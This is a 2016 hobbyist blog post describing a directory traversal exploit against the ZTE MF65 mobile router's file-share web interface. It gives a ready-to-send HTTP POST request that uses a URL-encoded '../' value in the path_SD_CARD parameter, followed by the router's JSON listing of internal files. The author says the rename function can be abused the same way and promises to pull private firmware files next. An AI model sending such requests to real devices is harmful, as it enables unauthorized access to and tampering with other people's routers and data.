Sunday 5 June 2016

///Zte MF65 local file listing/include exploits///

///Zte MF65 local file listing/include exploits///

hey guys back again and another quickie but goodie,
ive been searching for any traces of the internal filesystem of this router by every method of lfi i could think of, i was lured to the http share page, this is the page used to upload files into the sd card, it seems to be locked to the mmc2 path, via the requests made, the paths are set in the httpshare files
(off the top of my head they are in the tmpl/sd path and in the js path)
the htttp page uses a directory check to obtain a listing of the files in the said directory(mmc2) by changing the check querys we end up with a few local file listing includes and a few local file includes:
we are using xml reqeusts via your favourite request launcher (nc,curl,burp,whatevs)

using:

POST /goform/goform_set_cmd_process HTTP/1.1
Host: 192.165.0.1
User-Agent: your own uA
 Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://--your ip --/index.html
Content-Length: 75
Connection: close
isTest=false&goformId=HTTPSHARE_ENTERFOLD&path_SD_CARD=%2F..%2F&indexPage=1


 we are using the path_SD_CARD=%2F..%2F
 (we must use url encoding on this param)
we can get listings from everywhere with this query
this is the results for the ./ path


 which returns with :

{"result":{"fileInfo":[{"fileName":".efs_private","attribute":"document","size":"0","lastUpdateTime":"315964800"},{"fileName":"1.txt","attribute":"file","size":"0","lastUpdateTime":"315964800"},{"fileName":"AUTORUN.FLG","attribute":"file","size":"0","lastUpdateTime":"315964800"},{"fileName":"Images","attribute":"document","size":"0","lastUpdateTime":"315964800"},{"fileName":"KEEPRNDISDBG.FLG","attribute":"file","size":"4","lastUpdateTime":"315964800"},{"fileName":"NODOWNLOAD.FLG","attribute":"file","size":"0","lastUpdateTime":"315964800"},{"fileName":"SWITCH.TMP","attribute":"file","size":"34","lastUpdateTime":"315964800"},{"fileName":"TCARD_SHARE","attribute":"file","size":"32","lastUpdateTime":"315964800"},{"fileName":"UimEfsAPDULog.Txt","attribute":"file","size":"0","lastUpdateTime":"315964800"},{"fileName":"ZTEMODEM.ISO","attribute":"file","size":"5216256","lastUpdateTime":"315964800"}],"totalRecord":"25"}}
{"fileName":"config","attribute":"file","size":"20080","lastUpdateTime":"315964800"}],"totalRecord":"25"}}
{"fileName":"etc","attribute":"document","size":"0","lastUpdateTime":"315964800"},
{"fileName":"mmc2","attribute":"document","size":"0","lastUpdateTime":"0"},{"fileName":"mmgsdi","attribute":"document","size":"0","lastUpdateTime":"315964800"},{"fileName":"nv","attribute":"document","size":"0","lastUpdateTime":"315964800"},{"fileName":"nvconfig_debug","attribute":"file","size":"7840","lastUpdateTime":"315964800"},{"fileName":"nvm","attribute":"document","size":"0","lastUpdateTime":"315964800"},{"fileName":"pbm_phone_uid.dat","attribute":"file","size":"9","lastUpdateTime":"315964800"},{"fileName":"pdp_profiles","attribute":"document","size":"0","lastUpdateTime":"315964800"},{"fileName":"reset_cntr.bin","attribute":"file","size":"4","lastUpdateTime":"315964800"},{"fileName":"sms","attribute":"document","size":"0","lastUpdateTime":"315964800"}],
{"fileName":"storage.ds","attribute":"file","size":"32","lastUpdateTime":"315964800"},{"fileName":"test","attribute":"file","size":"0","lastUpdateTime":"315964800"},
{"fileName":"var","attribute":"document","size":"0","lastUpdateTime":"315964800"},{"fileName":"web","attribute":"document","size":"0","lastUpdateTime":"315964800"},{"fileName":"wificonfig","attribute":"document","size":"0","lastUpdateTime":"315964800"}],"totalRecord":"25"}}


they are capped at returning a max of 10ish files but changing indxPage to 2 will load the next page of results,
notice the .efs_private file
lending hints that the fs is encrypted and extracted at run time, there is many keys inside the firmware provided by u_mob for the mf65 that are almost 100% the same file system except for of cause the providers changes, like telstra dont call there query key a lucky number anymore its just _=(luckynumber)=(timeinseconds)

well stay tuned as i pull that .efs_private and the ZTEMODEM.ISO files


also a quick trick is to change the names of the uploaded files via the rename to resolve a file in a place other than the mmc2 folder
the rename query can also be used to change file names of files in other places using the same exploits, please ill get around to these as soon as i get the chance

till then guys stay fucken sharp and dont trip on your self :P

Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)